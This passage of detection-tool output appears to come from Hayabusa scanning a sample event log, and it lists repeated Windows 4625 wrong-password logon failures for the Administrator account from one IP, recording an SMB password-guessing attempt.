192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.507 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lE8kvmcQtCmlsqtT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.548 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXmfjxrGC3liZ2oh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.589 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72JLcUBrhOoXPLzD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.635 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sRoFpK2ZvBYy4jGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.676 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9KReiI3k2WIKpxFq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.722 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
wsfSzPbji6ARhU0k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.760 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axeCxygvJ4zL4Xoq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.809 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y64sc51Y7vbiFTIQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.853 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o395tRQcfRBTTCSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.892 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1R4wlYWS4SkM3dF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.938 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsZy0Yjvk720Mu22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: c8RusStjhReKBmS0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.026 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eJuPYLTcGaGvErLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.069 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: raCbua01mzU1Djuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fnt8atAbMtxXivUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.165 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: psokvQJyMn5m5rMh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.210 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wTPGqOITsOhpTgIF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: xxhGrLzhwNziihc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.296 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UIb1lHuPaC62UlBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.338 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2uvXuLIR9yvmWngF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.382 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MI35CCybjNtntfwo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.426 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GTJfOkk0fUC5YCX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.456 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jk6PsiAiLPsHGUh1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.496 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: KeGDMp9My5eLJz55 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.541 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BvDQphjvwOCsNQqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.592 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJhad4aocvPMYVP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.635 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJl3XqTUxvqiKKaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.693 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1fAJDfguuoNxWiR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daAeGcsqoqERsEu6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.908 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0iynnwxS8v4C5b3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.955 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2kU7IS4XCvgRpTff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:08.999 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MBC8AJXBQHrCMrO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.049 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NSGraDQmI4MAq9Ls | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7u2Pb9y8hB0iYWh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.132 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A657rbd6k4AD7M4i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:09.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7rkiDUBuTCU2jDXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.224 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jjsCFTQoobrkQoWF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.273 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dNXav95nZyBhVOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.316 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yeq1x56Ct6R2Nu3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.359 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pUwyCNtwydEQu2bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.396 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bX7eihAOk3PUgbwM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.442 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPXqAsaYaXEr8I9L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.480 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4SaEmIpmlH1VMDun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.534 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3Dvp43a2h7Mzx2H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.575 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g3voKlRXc7rIaIYs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.629 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GF1Q5OhCLRAi96mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.669 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: caHe4iY2CQoiumQI | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.734 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJi6UAm6Pp6eax8Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.784 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EW0t2wapD8yniO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.872 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PnaITXTihpB0stwx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.913 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tdBVoa82WKEAW2ce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:09.953 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BelKzJrEjGIcU2dN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
Ujeb7fRHPGCGmFm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.060 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Czwt7KF2sQHemwdJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.117 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LQQ4nNpbfKKVCJZH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.157 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6jwIc6e0AHAhXKK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.200 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nld9Job0Ll1Fgtmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.242 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9sS6i9iU3PXhokz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: heaYv6Np8swhoVc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.334 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7rzgNBtUJkS93pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.381 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh45suNQ09FzPBjd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.431 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BOnwAGxxz994k6Ee | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.474 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L26mvUKOgGptcKaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.517 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aqldRjcLl8KFZr5h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.569 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: ycNPBtmRHShPOcRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.617 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ISlMGsVvXry0rbju | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MjGjh70EQ5YVGJUt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.700 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yaYM5N2kuvuRCHRU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.738 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 32wgj2t7BLBviVxd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.789 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vr1kMRxLEaCIWIbf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.832 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: 4PHEJyKgp5wXRtBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbaoz8rTZVXUjRAg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.928 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d4eD3JQ5gquIqgND | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:10.969 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U9slFFSSXhFxPqG1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.009 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YDb5Up4KwJj0hN5n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.063 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DxqIpDLlnf6Xyc34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.106 
